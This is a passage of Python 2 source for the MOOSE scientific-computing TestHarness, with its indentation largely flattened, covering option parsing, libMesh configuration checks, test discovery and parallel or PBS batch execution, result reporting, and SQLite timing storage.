self.libmesh_dir = os.path.join(self.moose_dir, 'libmesh', 'installed')
self.file = None
# Parse arguments
self.parseCLArgs(argv)
self.checks = {}
self.checks['platform'] = getPlatforms()
self.checks['submodules'] = getInitializedSubmodules(self.run_tests_dir)
# The TestHarness doesn't strictly require the existence of libMesh in order to run. Here we allow the user
# to select whether they want to probe for libMesh configuration options.
if self.options.skip_config_checks:
self.checks['compiler'] = set(['ALL'])
self.checks['petsc_version'] = 'N/A'
self.checks['library_mode'] = set(['ALL'])
self.checks['mesh_mode'] = set(['ALL'])
self.checks['dtk'] = set(['ALL'])
self.checks['unique_ids'] = set(['ALL'])
self.checks['vtk'] = set(['ALL'])
self.checks['tecplot'] = set(['ALL'])
self.checks['dof_id_bytes'] = set(['ALL'])
self.checks['petsc_debug'] = set(['ALL'])
self.checks['curl'] = set(['ALL'])
self.checks['tbb'] = set(['ALL'])
self.checks['superlu'] = set(['ALL'])
self.checks['slepc'] = set(['ALL'])
self.checks['unique_id'] = set(['ALL'])
self.checks['cxx11'] = set(['ALL'])
self.checks['asio'] = set(['ALL'])
else:
self.checks['compiler'] = getCompilers(self.libmesh_dir)
self.checks['petsc_version'] = getPetscVersion(self.libmesh_dir)
self.checks['library_mode'] = getSharedOption(self.libmesh_dir)
self.checks['mesh_mode'] = getLibMeshConfigOption(self.libmesh_dir, 'mesh_mode')
self.checks['dtk'] = getLibMeshConfigOption(self.libmesh_dir, 'dtk')
self.checks['unique_ids'] = getLibMeshConfigOption(self.libmesh_dir, 'unique_ids')
self.checks['vtk'] = getLibMeshConfigOption(self.libmesh_dir, 'vtk')
self.checks['tecplot'] = getLibMeshConfigOption(self.libmesh_dir, 'tecplot')
self.checks['dof_id_bytes'] = getLibMeshConfigOption(self.libmesh_dir, 'dof_id_bytes')
self.checks['petsc_debug'] = getLibMeshConfigOption(self.libmesh_dir, 'petsc_debug')
self.checks['curl'] = getLibMeshConfigOption(self.libmesh_dir, 'curl')
self.checks['tbb'] = getLibMeshConfigOption(self.libmesh_dir, 'tbb')
self.checks['superlu'] = getLibMeshConfigOption(self.libmesh_dir, 'superlu')
self.checks['slepc'] = getLibMeshConfigOption(self.libmesh_dir, 'slepc')
self.checks['unique_id'] = getLibMeshConfigOption(self.libmesh_dir, 'unique_id')
self.checks['cxx11'] = getLibMeshConfigOption(self.libmesh_dir, 'cxx11')
self.checks['asio'] = getIfAsioExists(self.moose_dir)
# Override the MESH_MODE option if using the '--distributed-mesh'
# or (deprecated) '--parallel-mesh' option.
if (self.options.parallel_mesh == True or self.options.distributed_mesh == True) or \
(self.options.cli_args != None and \
(self.options.cli_args.find('--parallel-mesh') != -1 or self.options.cli_args.find('--distributed-mesh') != -1)):
option_set = set(['ALL', 'PARALLEL'])
self.checks['mesh_mode'] = option_set
method = set(['ALL', self.options.method.upper()])
self.checks['method'] = method
self.initialize(argv, app_name)
"""
Recursively walks the current tree looking for tests to run
Error codes:
0x0 - Success
0x0* - Parser error
0x1* - TestHarness error
"""
def findAndRunTests(self, find_only=False):
self.error_code = 0x0
self.preRun()
self.start_time = clock()
try:
# PBS STUFF
if self.options.pbs:
# Check to see if we are using the PBS Emulator.
# Its expensive, so it must remain outside of the os.walk for loop.
self.options.PBSEmulator = self.checkPBSEmulator()
if self.options.pbs and os.path.exists(self.options.pbs):
self.options.processingPBS = True
self.processPBSResults()
else:
self.options.processingPBS = False
self.base_dir = os.getcwd()
for dirpath, dirnames, filenames in os.walk(self.base_dir, followlinks=True):
                # Prune submodule paths when searching for tests
if self.base_dir != dirpath and os.path.exists(os.path.join(dirpath, '.git')):
dirnames[:] = []
# walk into directories that aren't contrib directories
if "contrib" not in os.path.relpath(dirpath, os.getcwd()):
for file in filenames:
# set cluster_handle to be None initially (happens for each test)
self.options.cluster_handle = None
# See if there were other arguments (test names) passed on the command line
if file == self.options.input_file_name: #and self.test_match.search(file):
saved_cwd = os.getcwd()
sys.path.append(os.path.abspath(dirpath))
os.chdir(dirpath)
if self.prunePath(file):
continue
# Build a Parser to parse the objects
parser = Parser(self.factory, self.warehouse)
# Parse it
self.error_code = self.error_code | parser.parse(file)
# Retrieve the tests from the warehouse
testers = self.warehouse.getActiveObjects()
# Augment the Testers with additional information directly from the TestHarness
for tester in testers:
self.augmentParameters(file, tester)
# Short circuit this loop if we've only been asked to parse Testers
# Note: The warehouse will accumulate all testers in this mode
if find_only:
self.warehouse.markAllObjectsInactive()
continue
# Clear out the testers, we won't need them to stick around in the warehouse
self.warehouse.clear()
if self.options.enable_recover:
testers = self.appendRecoverableTests(testers)
# Handle PBS tests.cluster file
if self.options.pbs:
(tester, command) = self.createClusterLauncher(dirpath, testers)
if command is not None:
self.runner.run(tester, command)
else:
# Go through the Testers and run them
for tester in testers:
                                    # Double the allotted time for tests when running with the valgrind option
tester.setValgrindMode(self.options.valgrind_mode)
# When running in valgrind mode, we end up with a ton of output for each failed
# test. Therefore, we limit the number of fails...
if self.options.valgrind_mode and self.num_failed > self.options.valgrind_max_fails:
(should_run, reason) = (False, 'Max Fails Exceeded')
elif self.num_failed > self.options.max_fails:
(should_run, reason) = (False, 'Max Fails Exceeded')
elif tester.parameters().isValid('error_code'):
(should_run, reason) = (False, 'skipped (Parser Error)')
else:
(should_run, reason) = tester.checkRunnableBase(self.options, self.checks)
if should_run:
command = tester.getCommand(self.options)
# This method spawns another process and allows this loop to continue looking for tests
# RunParallel will call self.testOutputAndFinish when the test has completed running
# This method will block when the maximum allowed parallel processes are running
self.runner.run(tester, command)
else: # This job is skipped - notify the runner
if reason != '':
if (self.options.report_skipped and reason.find('skipped') != -1) or reason.find('skipped') == -1:
self.handleTestResult(tester.parameters(), '', reason)
self.runner.jobSkipped(tester.parameters()['test_name'])
os.chdir(saved_cwd)
sys.path.pop()
except KeyboardInterrupt:
print '\nExiting due to keyboard interrupt...'
sys.exit(0)
self.runner.join()
# Wait for all tests to finish
if self.options.pbs and self.options.processingPBS == False:
print '\n< checking batch status >\n'
self.options.processingPBS = True
self.processPBSResults()
self.cleanup()
# Flags for the parser start at the low bit, flags for the TestHarness start at the high bit
if self.num_failed:
self.error_code = self.error_code | 0x80
return
def createClusterLauncher(self, dirpath, testers):
self.options.test_serial_number = 0
command = None
tester = None
# Create the tests.cluster input file
# Loop through each tester and create a job
for tester in testers:
(should_run, reason) = tester.checkRunnableBase(self.options, self.checks)
if should_run:
if self.options.cluster_handle == None:
self.options.cluster_handle = open(dirpath + '/' + self.options.pbs + '.cluster', 'w')
self.options.cluster_handle.write('[Jobs]\n')
# This returns the command to run as well as builds the parameters of the test
# The resulting command once this loop has completed is sufficient to launch
# all previous jobs
command = tester.getCommand(self.options)
self.options.cluster_handle.write('[]\n')
self.options.test_serial_number += 1
else: # This job is skipped - notify the runner
if (reason != ''):
self.handleTestResult(tester.parameters(), '', reason)
self.runner.jobSkipped(tester.parameters()['test_name'])
# Close the tests.cluster file
if self.options.cluster_handle is not None:
self.options.cluster_handle.close()
self.options.cluster_handle = None
# Return the final tester/command (sufficient to run all tests)
return (tester, command)
def prunePath(self, filename):
test_dir = os.path.abspath(os.path.dirname(filename))
# Filter tests that we want to run
# Under the new format, we will filter based on directory not filename since it is fixed
prune = True
if len(self.tests) == 0:
prune = False # No filter
else:
for item in self.tests:
if test_dir.find(item) > -1:
prune = False
# Return the inverse of will_run to indicate that this path should be pruned
return prune
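    # Illustrative behaviour (not part of the original source): with no test names given
    # on the command line nothing is pruned; with e.g. ['kernels/simple_diffusion']
    # (hypothetical), only test directories whose absolute path contains that substring run.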
def augmentParameters(self, filename, tester):
params = tester.parameters()
# We are going to do some formatting of the path that is printed
# Case 1. If the test directory (normally matches the input_file_name) comes first,
# we will simply remove it from the path
# Case 2. If the test directory is somewhere in the middle then we should preserve
# the leading part of the path
test_dir = os.path.abspath(os.path.dirname(filename))
relative_path = test_dir.replace(self.run_tests_dir, '')
relative_path = relative_path.replace('/' + self.options.input_file_name + '/', ':')
relative_path = re.sub('^[/:]*', '', relative_path) # Trim slashes and colons
formatted_name = relative_path + '.' + tester.name()
params['test_name'] = formatted_name
params['test_dir'] = test_dir
params['relative_path'] = relative_path
params['executable'] = self.executable
params['hostname'] = self.host_name
params['moose_dir'] = self.moose_dir
params['base_dir'] = self.base_dir
if params.isValid('prereq'):
if type(params['prereq']) != list:
print "Option 'prereq' needs to be of type list in " + params['test_name']
sys.exit(1)
params['prereq'] = [relative_path.replace('/tests/', '') + '.' + item for item in params['prereq']]
    # This method splits a list of tests into two pieces each, the first piece will run the test for
# approx. half the number of timesteps and will write out a restart file. The second test will
# then complete the run using the MOOSE recover option.
def appendRecoverableTests(self, testers):
new_tests = []
for part1 in testers:
if part1.parameters()['recover'] == True:
# Clone the test specs
part2 = copy.deepcopy(part1)
# Part 1:
part1_params = part1.parameters()
part1_params['test_name'] += '_part1'
part1_params['cli_args'].append('--half-transient Outputs/checkpoint=true')
part1_params['skip_checks'] = True
# Part 2:
part2_params = part2.parameters()
part2_params['prereq'].append(part1.parameters()['test_name'])
part2_params['delete_output_before_running'] = False
part2_params['cli_args'].append('--recover')
part2_params.addParam('caveats', ['recover'], "")
new_tests.append(part2)
testers.extend(new_tests)
return testers
## Finish the test by inspecting the raw output
def testOutputAndFinish(self, tester, retcode, output, start=0, end=0):
caveats = []
test = tester.specs # Need to refactor
if test.isValid('caveats'):
caveats = test['caveats']
if self.options.pbs and self.options.processingPBS == False:
(reason, output) = self.buildPBSBatch(output, tester)
elif self.options.dry_run:
reason = 'DRY_RUN'
output += '\n'.join(tester.processResultsCommand(self.moose_dir, self.options))
else:
(reason, output) = tester.processResults(self.moose_dir, retcode, self.options, output)
if self.options.scaling and test['scale_refine']:
caveats.append('scaled')
did_pass = True
if reason == '':
            # It ran OK, but is this test set to be skipped on any platform, compiler, or other reason?
if self.options.extra_info:
checks = ['platform', 'compiler', 'petsc_version', 'mesh_mode', 'method', 'library_mode', 'dtk', 'unique_ids']
for check in checks:
if not 'ALL' in test[check]:
caveats.append(', '.join(test[check]))
if len(caveats):
result = '[' + ', '.join(caveats).upper() + '] OK'
elif self.options.pbs and self.options.processingPBS == False:
result = 'LAUNCHED'
else:
result = 'OK'
elif reason == 'DRY_RUN':
result = 'DRY_RUN'
else:
result = 'FAILED (%s)' % reason
did_pass = False
if self.options.pbs and self.options.processingPBS == False and did_pass == True:
# Handle the launch result, but do not add it to the results table (except if we learned that QSUB failed to launch for some reason)
self.handleTestResult(tester.specs, output, result, start, end, False)
return did_pass
else:
self.handleTestResult(tester.specs, output, result, start, end)
return did_pass
def getTiming(self, output):
time = ''
m = re.search(r"Active time=(\S+)", output)
if m != None:
return m.group(1)
def getSolveTime(self, output):
time = ''
m = re.search(r"solve().*", output)
if m != None:
return m.group().split()[5]
def checkExpectError(self, output, expect_error):
if re.search(expect_error, output, re.MULTILINE | re.DOTALL) == None:
#print "%" * 100, "\nExpect Error Pattern not found:\n", expect_error, "\n", "%" * 100, "\n"
return False
else:
return True
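    # Illustrative behaviour (not part of the original source): checkExpectError() returns
    # True only when expect_error matches somewhere in the captured output, e.g.
    # checkExpectError(stdout, r"Floating point exception") on hypothetical output.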
# PBS Defs
def checkPBSEmulator(self):
try:
qstat_process = subprocess.Popen(['qstat', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
qstat_output = qstat_process.communicate()
except OSError:
# qstat binary is not available
print 'qstat not available. Perhaps you need to load the PBS module?'
sys.exit(1)
if len(qstat_output[1]):
# The PBS Emulator has no --version argument, and thus returns output to stderr
return True
else:
return False
def processPBSResults(self):
# If batch file exists, check the contents for pending tests.
if os.path.exists(self.options.pbs):
# Build a list of launched jobs
batch_file = open(self.options.pbs)
batch_list = [y.split(':') for y in [x for x in batch_file.read().split('\n')]]
batch_file.close()
del batch_list[-1:]
            # Loop through launched jobs and match the TEST_NAME to determine the correct stdout (Output_Path)
for job in batch_list:
file = '/'.join(job[2].split('/')[:-2]) + '/' + job[3]
# Build a Warehouse to hold the MooseObjects
warehouse = Warehouse()
# Build a Parser to parse the objects
parser = Parser(self.factory, warehouse)
# Parse it
parser.parse(file)
# Retrieve the tests from the warehouse
testers = warehouse.getAllObjects()
for tester in testers:
self.augmentParameters(file, tester)
for tester in testers:
# Build the requested Tester object
if job[1] == tester.parameters()['test_name']:
# Create Test Type
# test = self.factory.create(tester.parameters()['type'], tester)
# Get job status via qstat
qstat = ['qstat', '-f', '-x', str(job[0])]
qstat_command = subprocess.Popen(qstat, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
qstat_stdout = qstat_command.communicate()[0]
if qstat_stdout != None:
output_value = re.search(r'job_state = (\w+)', qstat_stdout).group(1)
else:
return ('QSTAT NOT FOUND', '')
# Report the current status of JOB_ID
if output_value == 'F':
# F = Finished. Get the exit code reported by qstat
exit_code = int(re.search(r'Exit_status = (-?\d+)', qstat_stdout).group(1))
# Read the stdout file
if os.path.exists(job[2]):
output_file = open(job[2], 'r')
# Not sure I am doing this right: I have to change the TEST_DIR to match the temporary cluster_launcher TEST_DIR location, thus violating the tester.specs...
tester.parameters()['test_dir'] = '/'.join(job[2].split('/')[:-1])
outfile = output_file.read()
output_file.close()
self.testOutputAndFinish(tester, exit_code, outfile)
else:
# I ran into this scenario when the cluster went down, but launched/completed my job :)
self.handleTestResult(tester.specs, '', 'FAILED (NO STDOUT FILE)', 0, 0, True)
elif output_value == 'R':
# Job is currently running
self.handleTestResult(tester.specs, '', 'RUNNING', 0, 0, True)
elif output_value == 'E':
# Job is exiting
self.handleTestResult(tester.specs, '', 'EXITING', 0, 0, True)
elif output_value == 'Q':
# Job is currently queued
self.handleTestResult(tester.specs, '', 'QUEUED', 0, 0, True)
else:
return ('BATCH FILE NOT FOUND', '')
def buildPBSBatch(self, output, tester):
# Create/Update the batch file
if 'command not found' in output:
return ('QSUB NOT FOUND', '')
else:
# Get the Job information from the ClusterLauncher
results = re.findall(r'JOB_NAME: (\w+) JOB_ID:.* (\d+).*TEST_NAME: (\S+)', output)
if len(results) != 0:
file_name = self.options.pbs
job_list = open(os.path.abspath(os.path.join(tester.specs['executable'], os.pardir)) + '/' + file_name, 'a')
for result in results:
(test_dir, job_id, test_name) = result
qstat_command = subprocess.Popen(['qstat', '-f', '-x', str(job_id)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
qstat_stdout = qstat_command.communicate()[0]
# Get the Output_Path from qstat stdout
if qstat_stdout != None:
output_value = re.search(r'Output_Path(.*?)(^ +)', qstat_stdout, re.S | re.M).group(1)
output_value = output_value.split(':')[1].replace('\n', '').replace('\t', '').strip()
else:
job_list.close()
return ('QSTAT NOT FOUND', '')
                    # Write job_id, test['test_name'], and Output_Path to the batch file
job_list.write(str(job_id) + ':' + test_name + ':' + output_value + ':' + self.options.input_file_name + '\n')
# Return to TestHarness and inform we have launched the job
job_list.close()
return ('', 'LAUNCHED')
else:
return ('QSTAT INVALID RESULTS', output)
def cleanPBSBatch(self):
# Open the PBS batch file and assign it to a list
if os.path.exists(self.options.pbs_cleanup):
batch_file = open(self.options.pbs_cleanup, 'r')
batch_list = [y.split(':') for y in [x for x in batch_file.read().split('\n')]]
batch_file.close()
del batch_list[-1:]
else:
print 'PBS batch file not found:', self.options.pbs_cleanup
sys.exit(1)
        # Loop through launched jobs and delete what is found.
for job in batch_list:
if os.path.exists(job[2]):
batch_dir = os.path.abspath(os.path.join(job[2], os.pardir)).split('/')
if os.path.exists('/'.join(batch_dir)):
shutil.rmtree('/'.join(batch_dir))
if os.path.exists('/'.join(batch_dir[:-1]) + '/' + self.options.pbs_cleanup + '.cluster'):
os.remove('/'.join(batch_dir[:-1]) + '/' + self.options.pbs_cleanup + '.cluster')
os.remove(self.options.pbs_cleanup)
# END PBS Defs
## Update global variables and print output based on the test result
# Containing OK means it passed, skipped means skipped, anything else means it failed
def handleTestResult(self, specs, output, result, start=0, end=0, add_to_table=True):
timing = ''
if self.options.timing:
timing = self.getTiming(output)
elif self.options.store_time:
timing = self.getSolveTime(output)
# Only add to the test_table if told to. We now have enough cases where we wish to print to the screen, but not
# in the 'Final Test Results' area.
if add_to_table:
self.test_table.append( (specs, output, result, timing, start, end) )
if result.find('OK') != -1 or result.find('DRY_RUN') != -1:
self.num_passed += 1
elif result.find('skipped') != -1:
self.num_skipped += 1
elif result.find('deleted') != -1:
self.num_skipped += 1
elif result.find('LAUNCHED') != -1 or result.find('RUNNING') != -1 or result.find('QUEUED') != -1 or result.find('EXITING') != -1:
self.num_pending += 1
else:
self.num_failed += 1
self.postRun(specs, timing)
if self.options.show_directory:
print printResult(specs['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options)
else:
print printResult(specs['test_name'], result, timing, start, end, self.options)
if self.options.verbose or ('FAILED' in result and not self.options.quiet):
output = output.replace('\r', '\n') # replace the carriage returns with newlines
lines = output.split('\n');
color = ''
if 'EXODIFF' in result or 'CSVDIFF' in result:
color = 'YELLOW'
elif 'FAILED' in result:
color = 'RED'
else:
color = 'GREEN'
test_name = colorText(specs['test_name'] + ": ", color, colored=self.options.colored, code=self.options.code)
output = test_name + ("\n" + test_name).join(lines)
print output
# Print result line again at the bottom of the output for failed tests
if self.options.show_directory:
print printResult(specs['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options), "(reprint)"
else:
print printResult(specs['test_name'], result, timing, start, end, self.options), "(reprint)"
if not 'skipped' in result:
if self.options.file:
if self.options.show_directory:
self.file.write(printResult( specs['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options, color=False) + '\n')
self.file.write(output)
else:
self.file.write(printResult( specs['test_name'], result, timing, start, end, self.options, color=False) + '\n')
self.file.write(output)
if self.options.sep_files or (self.options.fail_files and 'FAILED' in result) or (self.options.ok_files and result.find('OK') != -1):
fname = os.path.join(specs['test_dir'], specs['test_name'].split('/')[-1] + '.' + result[:6] + '.txt')
f = open(fname, 'w')
f.write(printResult( specs['test_name'], result, timing, start, end, self.options, color=False) + '\n')
f.write(output)
f.close()
# Write the app_name to a file, if the tests passed
def writeState(self, app_name):
        # If the BITTEN_STATUS_MOOSE environment variable is set, build a line-itemized list of applications which passed their tests
if os.environ.has_key("BITTEN_STATUS_MOOSE"):
result_file = open(os.path.join(self.moose_dir, 'test_results.log'), 'a')
result_file.write(os.path.split(app_name)[1].split('-')[0] + '\n')
result_file.close()
# Print final results, close open files, and exit with the correct error code
def cleanup(self):
# Print the results table again if a bunch of output was spewed to the screen between
# tests as they were running
if self.options.verbose or (self.num_failed != 0 and not self.options.quiet):
print '\n\nFinal Test Results:\n' + ('-' * (TERM_COLS-1))
for (test, output, result, timing, start, end) in sorted(self.test_table, key=lambda x: x[2], reverse=True):
if self.options.show_directory:
print printResult(test['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options)
else:
print printResult(test['test_name'], result, timing, start, end, self.options)
time = clock() - self.start_time
print '-' * (TERM_COLS-1)
print 'Ran %d tests in %.1f seconds' % (self.num_passed+self.num_failed, time)
if self.num_passed:
summary = '<g>%d passed</g>'
else:
summary = '<b>%d passed</b>'
summary += ', <b>%d skipped</b>'
if self.num_pending:
summary += ', <c>%d pending</c>'
else:
summary += ', <b>%d pending</b>'
if self.num_failed:
summary += ', <r>%d FAILED</r>'
else:
summary += ', <b>%d failed</b>'
# Mask off TestHarness error codes to report parser errors
if self.error_code & Parser.getErrorCodeMask():
summary += ', <r>FATAL PARSER ERROR</r>'
print colorText( summary % (self.num_passed, self.num_skipped, self.num_pending, self.num_failed), "", html = True, \
colored=self.options.colored, code=self.options.code )
if self.options.pbs:
print '\nYour PBS batch file:', self.options.pbs
if self.file:
self.file.close()
if self.num_failed == 0:
self.writeState(self.executable)
def initialize(self, argv, app_name):
# Initialize the parallel runner with how many tests to run in parallel
self.runner = RunParallel(self, self.options.jobs, self.options.load)
## Save executable-under-test name to self.executable
self.executable = os.getcwd() + '/' + app_name + '-' + self.options.method
# Save the output dir since the current working directory changes during tests
self.output_dir = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), self.options.output_dir)
# Create the output dir if they ask for it. It is easier to ask for forgiveness than permission
if self.options.output_dir:
try:
os.makedirs(self.output_dir)
except OSError, ex:
if ex.errno == errno.EEXIST: pass
else: raise
# Open the file to redirect output to and set the quiet option for file output
if self.options.file:
self.file = open(os.path.join(self.output_dir, self.options.file), 'w')
if self.options.file or self.options.fail_files or self.options.sep_files:
self.options.quiet = True
## Parse command line options and assign them to self.options
def parseCLArgs(self, argv):
parser = argparse.ArgumentParser(description='A tool used to test MOOSE based applications')
parser.add_argument('test_name', nargs=argparse.REMAINDER)
parser.add_argument('--opt', action='store_const', dest='method', const='opt', help='test the app_name-opt binary')
parser.add_argument('--dbg', action='store_const', dest='method', const='dbg', help='test the app_name-dbg binary')
parser.add_argument('--devel', action='store_const', dest='method', const='devel', help='test the app_name-devel binary')
parser.add_argument('--oprof', action='store_const', dest='method', const='oprof', help='test the app_name-oprof binary')
parser.add_argument('--pro', action='store_const', dest='method', const='pro', help='test the app_name-pro binary')
parser.add_argument('-j', '--jobs', nargs='?', metavar='int', action='store', type=int, dest='jobs', const=1, help='run test binaries in parallel')
parser.add_argument('-e', action='store_true', dest='extra_info', help='Display "extra" information including all caveats and deleted tests')
parser.add_argument('-c', '--no-color', action='store_false', dest='colored', help='Do not show colored output')
parser.add_argument('--heavy', action='store_true', dest='heavy_tests', help='Run tests marked with HEAVY : True')
parser.add_argument('--all-tests', action='store_true', dest='all_tests', help='Run normal tests and tests marked with HEAVY : True')
parser.add_argument('-g', '--group', action='store', type=str, dest='group', default='ALL', help='Run only tests in the named group')
parser.add_argument('--not_group', action='store', type=str, dest='not_group', help='Run only tests NOT in the named group')
# parser.add_argument('--dofs', action='store', dest='dofs', help='This option is for automatic scaling which is not currently implemented in MOOSE 2.0')
parser.add_argument('--dbfile', nargs='?', action='store', dest='dbFile', help='Location to timings data base file. If not set, assumes $HOME/timingDB/timing.sqlite')
parser.add_argument('-l', '--load-average', action='store', type=float, dest='load', default=64.0, help='Do not run additional tests if the load average is at least LOAD')
parser.add_argument('-t', '--timing', action='store_true', dest='timing', help='Report Timing information for passing tests')
parser.add_argument('-s', '--scale', action='store_true', dest='scaling', help='Scale problems that have SCALE_REFINE set')
parser.add_argument('-i', nargs=1, action='store', type=str, dest='input_file_name', default='tests', help='The default test specification file to look for (default="tests").')
parser.add_argument('--libmesh_dir', nargs=1, action='store', type=str, dest='libmesh_dir', help='Currently only needed for bitten code coverage')
parser.add_argument('--skip-config-checks', action='store_true', dest='skip_config_checks', help='Skip configuration checks (all tests will run regardless of restrictions)')
parser.add_argument('--parallel', '-p', nargs='?', action='store', type=int, dest='parallel', const=1, help='Number of processors to use when running mpiexec')
parser.add_argument('--n-threads', nargs=1, action='store', type=int, dest='nthreads', default=1, help='Number of threads to use when running mpiexec')
parser.add_argument('-d', action='store_true', dest='debug_harness', help='Turn on Test Harness debugging')
parser.add_argument('--recover', action='store_true', dest='enable_recover', help='Run a test in recover mode')
parser.add_argument('--valgrind', action='store_const', dest='valgrind_mode', const='NORMAL', help='Run normal valgrind tests')
parser.add_argument('--valgrind-heavy', action='store_const', dest='valgrind_mode', const='HEAVY', help='Run heavy valgrind tests')
parser.add_argument('--valgrind-max-fails', nargs=1, type=int, dest='valgrind_max_fails', default=5, help='The number of valgrind tests allowed to fail before any additional valgrind tests will run')
parser.add_argument('--max-fails', nargs=1, type=int, dest='max_fails', default=50, help='The number of tests allowed to fail before any additional tests will run')
parser.add_argument('--pbs', nargs='?', metavar='batch_file', dest='pbs', const='generate', help='Enable launching tests via PBS. If no batch file is specified one will be created for you')
parser.add_argument('--pbs-cleanup', nargs=1, metavar='batch_file', help='Clean up the directories/files created by PBS. You must supply the same batch_file used to launch PBS.')
parser.add_argument('--pbs-project', nargs=1, default='moose', help='Identify PBS job submission to specified project')
parser.add_argument('--re', action='store', type=str, dest='reg_exp', help='Run tests that match --re=regular_expression')
# Options that pass straight through to the executable
parser.add_argument('--parallel-mesh', action='store_true', dest='parallel_mesh', help='Deprecated, use --distributed-mesh instead')
parser.add_argument('--distributed-mesh', action='store_true', dest='distributed_mesh', help='Pass "--distributed-mesh" to executable')
parser.add_argument('--error', action='store_true', help='Run the tests with warnings as errors (Pass "--error" to executable)')
parser.add_argument('--error-unused', action='store_true', help='Run the tests with errors on unused parameters (Pass "--error-unused" to executable)')
# Option to use for passing unwrapped options to the executable
parser.add_argument('--cli-args', nargs='?', type=str, dest='cli_args', help='Append the following list of arguments to the command line (Encapsulate the command in quotes)')
parser.add_argument('--dry-run', action='store_true', dest='dry_run', help="Pass --dry-run to print commands to run, but don't actually run them")
outputgroup = parser.add_argument_group('Output Options', 'These options control the output of the test harness. The sep-files options write output to files named test_name.TEST_RESULT.txt. All file output will overwrite old files')
outputgroup.add_argument('-v', '--verbose', action='store_true', dest='verbose', help='show the output of every test')
outputgroup.add_argument('-q', '--quiet', action='store_true', dest='quiet', help='only show the result of every test, don\'t show test output even if it fails')
outputgroup.add_argument('--no-report', action='store_false', dest='report_skipped', help='do not report skipped tests')
outputgroup.add_argument('--show-directory', action='store_true', dest='show_directory', help='Print test directory path in out messages')
outputgroup.add_argument('-o', '--output-dir', nargs=1, metavar='directory', dest='output_dir', default='', help='Save all output files in the directory, and create it if necessary')
outputgroup.add_argument('-f', '--file', nargs=1, action='store', dest='file', help='Write verbose output of each test to FILE and quiet output to terminal')
outputgroup.add_argument('-x', '--sep-files', action='store_true', dest='sep_files', help='Write the output of each test to a separate file. Only quiet output to terminal. This is equivalant to \'--sep-files-fail --sep-files-ok\'')
outputgroup.add_argument('--sep-files-ok', action='store_true', dest='ok_files', help='Write the output of each passed test to a separate file')
outputgroup.add_argument('-a', '--sep-files-fail', action='store_true', dest='fail_files', help='Write the output of each FAILED test to a separate file. Only quiet output to terminal.')
outputgroup.add_argument("--store-timing", action="store_true", dest="store_time", help="Store timing in the SQL database: $HOME/timingDB/timing.sqlite A parent directory (timingDB) must exist.")
outputgroup.add_argument("--testharness-unittest", action="store_true", help="Run the TestHarness unittests that test the TestHarness.")
outputgroup.add_argument("--revision", nargs=1, action="store", type=str, dest="revision", help="The current revision being tested. Required when using --store-timing.")
outputgroup.add_argument("--yaml", action="store_true", dest="yaml", help="Dump the parameters for the testers in Yaml Format")
outputgroup.add_argument("--dump", action="store_true", dest="dump", help="Dump the parameters for the testers in GetPot Format")
code = True
if self.code.decode('hex') in argv:
del argv[argv.index(self.code.decode('hex'))]
code = False
self.options = parser.parse_args(argv[1:])
self.tests = self.options.test_name
self.options.code = code
# Convert all list based options of length one to scalars
for key, value in vars(self.options).items():
if type(value) == list and len(value) == 1:
setattr(self.options, key, value[0])
self.checkAndUpdateCLArgs()
## Called after options are parsed from the command line
# Exit if options don't make any sense, print warnings if they are merely weird
def checkAndUpdateCLArgs(self):
opts = self.options
if opts.output_dir and not (opts.file or opts.sep_files or opts.fail_files or opts.ok_files):
print 'WARNING: --output-dir is specified but no output files will be saved, use -f or a --sep-files option'
if opts.group == opts.not_group:
print 'ERROR: The group and not_group options cannot specify the same group'
sys.exit(1)
if opts.store_time and not (opts.revision):
print 'ERROR: --store-timing is specified but no --revision was given'
sys.exit(1)
if opts.store_time:
# timing returns Active Time, while store_timing returns Solve Time.
# Thus we need to turn off timing.
opts.timing = False
opts.scaling = True
if opts.valgrind_mode and (opts.parallel > 1 or opts.nthreads > 1):
print 'ERROR: --parallel and/or --threads can not be used with --valgrind'
sys.exit(1)
# Update any keys from the environment as necessary
if not self.options.method:
if os.environ.has_key('METHOD'):
self.options.method = os.environ['METHOD']
else:
self.options.method = 'opt'
if not self.options.valgrind_mode:
self.options.valgrind_mode = ''
# Update libmesh_dir to reflect arguments
if opts.libmesh_dir:
self.libmesh_dir = opts.libmesh_dir
# Generate a batch file if the PBS argument is supplied without a file name
if opts.pbs == 'generate':
largest_serial_num = 0
for name in os.listdir('.'):
m = re.search('pbs_(\d{3})', name)
if m != None and int(m.group(1)) > largest_serial_num:
largest_serial_num = int(m.group(1))
opts.pbs = "pbs_" + str(largest_serial_num+1).zfill(3)
# When running heavy tests, we'll make sure we use --no-report
if opts.heavy_tests:
self.options.report_skipped = False
def postRun(self, specs, timing):
return
def preRun(self):
if self.options.yaml:
self.factory.printYaml("Tests")
sys.exit(0)
elif self.options.dump:
self.factory.printDump("Tests")
sys.exit(0)
if self.options.pbs_cleanup:
self.cleanPBSBatch()
sys.exit(0)
def getOptions(self):
return self.options
#################################################################################################################################
# The TestTimer TestHarness
# This class finds and stores timing for individual tests. It is activated with --store-timing
#################################################################################################################################
CREATE_TABLE = """create table timing
(
app_name text,
test_name text,
revision text,
date int,
seconds real,
scale int,
load real
);"""
class TestTimer(TestHarness):
def __init__(self, argv, app_name, moose_dir):
TestHarness.__init__(self, argv, app_name, moose_dir)
try:
from sqlite3 import dbapi2 as sqlite
except ImportError:
print 'Error: --store-timing requires the sqlite3 python module.'
sys.exit(1)
self.app_name = app_name
self.db_file = self.options.dbFile
if not self.db_file:
home = os.environ['HOME']
self.db_file = os.path.join(home, 'timingDB/timing.sqlite')
if not os.path.exists(self.db_file):
print 'Warning: creating new database at default location: ' + str(self.db_file)
self.createDB(self.db_file)
else:
print 'Warning: Assuming database location ' + self.db_file
def createDB(self, fname):
from sqlite3 import dbapi2 as sqlite
print 'Creating empty database at ' + fname
con = sqlite.connect(fname)
cr = con.cursor()
cr.execute(CREATE_TABLE)
con.commit()
def preRun(self):
from sqlite3 import dbapi2 as sqlite
# Delete previous data if app_name and repo revision are found
con = sqlite.connect(self.db_file)
cr = con.cursor()
cr.execute('delete from timing where app_name = ? and revision = ?', (self.app_name, self.options.revision))
con.commit()
# After the run store the results in the database
